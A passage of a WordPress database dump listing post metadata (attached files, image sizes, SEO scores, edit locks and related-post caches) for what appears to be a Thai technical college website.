(12748, 5645, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1241;s:6:\"height\";i:1754;s:4:\"file\";s:31:\"2019/05/Document-page-002-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"Document-page-002-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"Document-page-002-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"Document-page-002-1-768x1085.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1085;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"Document-page-002-1-725x1024.jpg\";s:5:\"width\";i:725;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"Document-page-002-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12749, 5646, '_wp_attached_file', '2019/05/Document-page-003.jpg'),
(12750, 5646, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1241;s:6:\"height\";i:1754;s:4:\"file\";s:29:\"2019/05/Document-page-003.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"Document-page-003-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Document-page-003-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"Document-page-003-768x1085.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1085;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"Document-page-003-725x1024.jpg\";s:5:\"width\";i:725;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"Document-page-003-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12754, 5640, '_hide_featured', NULL),
(12755, 5640, '_yoast_wpseo_content_score', '60'),
(12756, 5640, '_yoast_wpseo_primary_category', '3'),
(12757, 5640, '_wpas_done_all', '1'),
(12758, 5640, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575744719;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4139;}i:1;a:1:{s:2:\"id\";i:6008;}i:2;a:1:{s:2:\"id\";i:5906;}}}}'),
(12759, 5648, '_edit_lock', '1559187810:14'),
(12760, 5648, '_edit_last', '14'),
(12761, 5649, '_wp_attached_file', '2019/05/เอกสาร-61.pdf'),
(12765, 5648, '_hide_featured', NULL),
(12766, 5648, '_yoast_wpseo_content_score', '60'),
(12767, 5648, '_yoast_wpseo_primary_category', '3'),
(12768, 5648, '_wpas_done_all', '1'),
(12773, 5648, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575398053;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4708;}i:1;a:1:{s:2:\"id\";i:4638;}i:2;a:1:{s:2:\"id\";i:4869;}}}}'),
(12774, 5662, '_edit_lock', '1559619570:14'),
(12775, 5662, '_edit_last', '14'),
(12776, 5663, '_wp_attached_file', '2019/06/040662-ประกาศรายชื่อครูอัตราจ้าง.pdf'),
(12777, 5664, '_wp_attached_file', '2019/06/040662-ประกาศรายชื่อครูอัตราจ้าง-1.pdf'),
(12778, 5665, '_wp_attached_file', '2019/06/040662-ประกาศรายชื่อครูอัตราจ้าง-2.pdf'),
(12782, 5662, '_hide_featured', NULL),
(12783, 5662, '_yoast_wpseo_content_score', '60'),
(12784, 5662, '_yoast_wpseo_primary_category', '3'),
(12785, 5662, '_wpas_done_all', '1'),
(12788, 5662, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575222674;s:7:\"payload\";a:0:{}}}'),
(12789, 5667, '_edit_lock', '1559619970:14'),
(12790, 5667, '_edit_last', '14'),
(12791, 5668, '_wp_attached_file', '2019/06/040662-.jpg'),
(12792, 5668, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1043;s:6:\"height\";i:846;s:4:\"file\";s:19:\"2019/06/040662-.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"040662--150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"040662--300x243.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:243;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"040662--768x623.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:623;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"040662--1024x831.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:831;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:19:\"040662--370x300.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12793, 5667, '_thumbnail_id', '5668'),
(12797, 5667, '_hide_featured', NULL),
(12798, 5667, '_yoast_wpseo_content_score', '90'),
(12799, 5667, '_yoast_wpseo_primary_category', '31'),
(12800, 5667, '_wpas_done_all', '1'),
(12803, 5667, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575740856;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5671;}i:1;a:1:{s:2:\"id\";i:6060;}i:2;a:1:{s:2:\"id\";i:6026;}}}}'),
(12804, 5671, '_edit_lock', '1560397903:14'),
(12805, 5671, '_edit_last', '14'),
(12806, 5672, '_wp_attached_file', '2019/06/040662-วันจันทร์ที่-๓-มิถุนายน-๒๕๖๒-คณะผู้บริหาร-ครู-บุคลากรทางการศึกษา-วิทยาลัยเทคนิคระยอง-.jpg'),
(12807, 5672, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:258:\"2019/06/040662-วันจันทร์ที่-๓-มิถุนายน-๒๕๖๒-คณะผู้บริหาร-ครู-บุคลากรทางการศึกษา-วิทยาลัยเทคนิคระยอง-.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12808, 5673, '_wp_attached_file', '2019/06/040662-วันจันทร์ที่-๓-มิถุนายน-๒๕๖๒-คณะผู้บริหาร-ครู-บุคลากรทางการศึกษา-วิทยาลัยเทคนิคระยอง-1-1.jpg'),
(12809, 5673, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:261:\"2019/06/040662-วันจันทร์ที่-๓-มิถุนายน-๒๕๖๒-คณะผู้บริหาร-ครู-บุคลากรทางการศึกษา-วิทยาลัยเทคนิคระยอง-1-1.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12810, 5671, '_thumbnail_id', '5787'),
(12814, 5671, '_hide_featured', NULL),
(12815, 5671, '_yoast_wpseo_content_score', '30'),
(12816, 5671, '_yoast_wpseo_primary_category', '31'),
(12817, 5671, '_wpas_done_all', '1'),
(12822, 5671, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575730501;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6037;}i:1;a:1:{s:2:\"id\";i:6060;}i:2;a:1:{s:2:\"id\";i:4107;}}}}'),
(12823, 5676, '_wp_attached_file', '2019/05/040662.pdf'),
(12824, 5677, '_wp_attached_file', '2019/05/040662-1.pdf'),
(12827, 5680, '_edit_lock', '1561365733:14'),
(12828, 5680, '_edit_last', '12'),
(12829, 5681, '_wp_attached_file', '2019/06/20190604175825947.pdf'),
(12833, 5680, '_hide_featured', NULL),
(12834, 5680, '_yoast_wpseo_content_score', '90'),
(12835, 5680, '_yoast_wpseo_primary_category', '3'),
(12836, 5680, '_wpas_done_all', '1'),
(12837, 5680, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575707886;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5878;}i:1;a:1:{s:2:\"id\";i:5952;}i:2;a:1:{s:2:\"id\";i:5589;}}}}'),
(12842, 5685, '_wp_attached_file', '2019/05/Slide1.png'),
(12843, 5685, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:18:\"2019/05/Slide1.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"Slide1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"Slide1-300x225.png\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"Slide1-768x576.png\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"Slide1-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12855, 3805, '_wp_desired_post_slug', '%e0%b9%91%e0%b9%90%e0%b9%90-%e0%b8%a7%e0%b8%b1%e0%b8%99-%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%a2%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87-%e0%b9%80%e0%b8%9b%e0%b8%a5%e0%b8%b5%e0%b9%88'),
(12856, 5700, '_wp_attached_file', '2019/06/ชุดที่-1_compressed.pdf'),
(12857, 5701, '_wp_attached_file', '2019/06/ชุดที่-2_compressed.pdf'),
(12858, 1706, '_yoast_wpseo_content_score', '60'),
(12859, 5704, '_wp_attached_file', '2019/05/Untitled-1.gif'),
(12860, 5704, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:634;s:6:\"height\";i:101;s:4:\"file\";s:22:\"2019/05/Untitled-1.gif\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-150x101.gif\";s:5:\"width\";i:150;s:6:\"height\";i:101;s:9:\"mime-type\";s:9:\"image/gif\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Untitled-1-300x48.gif\";s:5:\"width\";i:300;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/gif\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"Untitled-1-400x64.gif\";s:5:\"width\";i:400;s:6:\"height\";i:64;s:9:\"mime-type\";s:9:\"image/gif\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12862, 5707, '_wp_attached_file', '2019/06/รายงานการประเมินตนเอง-ปีการศึกษา-2561__14.39.pdf'),
(12867, 5716, '_tablepress_table_options', '{\"last_editor\":14,\"table_head\":true,\"table_foot\":false,\"alternating_row_colors\":true,\"row_hover\":true,\"print_name\":false,\"print_name_position\":\"above\",\"print_description\":false,\"print_description_position\":\"below\",\"extra_css_classes\":\"\",\"use_datatables\":true,\"datatables_sort\":true,\"datatables_filter\":true,\"datatables_paginate\":true,\"datatables_lengthchange\":true,\"datatables_paginate_entries\":10,\"datatables_info\":true,\"datatables_scrollx\":false,\"datatables_custom_commands\":\"\"}'),
(12868, 5716, '_tablepress_table_visibility', '{\"rows\":[1],\"columns\":[1,1,1]}'),
(12869, 5718, '_wp_attached_file', '2019/06/อ.ปาริชาต-ธนาภรณ์.jpg'),
(12870, 5718, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:196;s:6:\"height\";i:243;s:4:\"file\";s:59:\"2019/06/อ.ปาริชาต-ธนาภรณ์.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"อ.ปาริชาต-ธนาภรณ์-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12871, 3479, '_yoast_wpseo_content_score', '30'),
(12872, 5721, '_edit_lock', '1580531931:14'),
(12873, 5723, '_wp_attached_file', '2019/06/บทความแบบฝึก-อ.ปาริชาต-1.pdf'),
(12874, 5721, '_edit_last', '14'),
(12875, 5725, '_wp_attached_file', '2019/06/บทความแบบฝึก-อ.ปาริชาต-1-1.pdf'),
(12876, 5721, '_hide_featured', NULL),
(12877, 5721, '_yoast_wpseo_content_score', '60'),
(12878, 5729, '_wp_attached_file', '2019/06/บทความ-อ.ปาริชาต-ธนาภรณ์-.pdf'),
(12879, 5733, '_edit_lock', '1560329783:14'),
(12880, 5734, '_wp_attached_file', '2019/06/120662.jpg'),
(12881, 5734, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:18:\"2019/06/120662.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"120662-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"120662-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"120662-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12882, 5733, '_edit_last', '14'),
(12883, 5735, '_wp_attached_file', '2019/06/120662-1.jpg'),
(12884, 5735, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2019/06/120662-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"120662-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"120662-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"120662-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12885, 5733, '_thumbnail_id', '5735'),
(12889, 5733, '_hide_featured', NULL),
(12890, 5733, '_yoast_wpseo_content_score', '90'),
(12891, 5733, '_yoast_wpseo_primary_category', '31'),
(12892, 5733, '_wpas_done_all', '1'),
(12895, 5733, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574698383;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5635;}i:1;a:1:{s:2:\"id\";i:5994;}i:2;a:1:{s:2:\"id\";i:5865;}}}}'),
(12902, 5741, '_wp_attached_file', '2019/06/120662.1.jpg'),
(12903, 5741, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:20:\"2019/06/120662.1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"120662.1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"120662.1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"120662.1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"120662.1-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"120662.1-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12904, 5742, '_wp_attached_file', '2019/06/120662.1-1.jpg'),
(12905, 5742, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:22:\"2019/06/120662.1-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"120662.1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"120662.1-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"120662.1-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"120662.1-1-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"120662.1-1-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12909, 5744, '_wp_attached_file', '2019/06/120662.1-2.jpg'),
(12910, 5744, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:22:\"2019/06/120662.1-2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"120662.1-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"120662.1-2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"120662.1-2-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"120662.1-2-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"120662.1-2-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12922, 5746, '_wp_attached_file', '2019/06/120662.1-3.jpg'),
(12923, 5746, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:22:\"2019/06/120662.1-3.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"120662.1-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"120662.1-3-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"120662.1-3-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"120662.1-3-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"120662.1-3-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(12924, 5748, '_wp_attached_file', '2019/06/120662.1-4.jpg'),
(12925, 5748, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:22:\"2019/06/120662.1-4.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"120662.1-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"120662.1-4-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"120662.1-4-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"120662.1-4-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"120662.1-4-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s: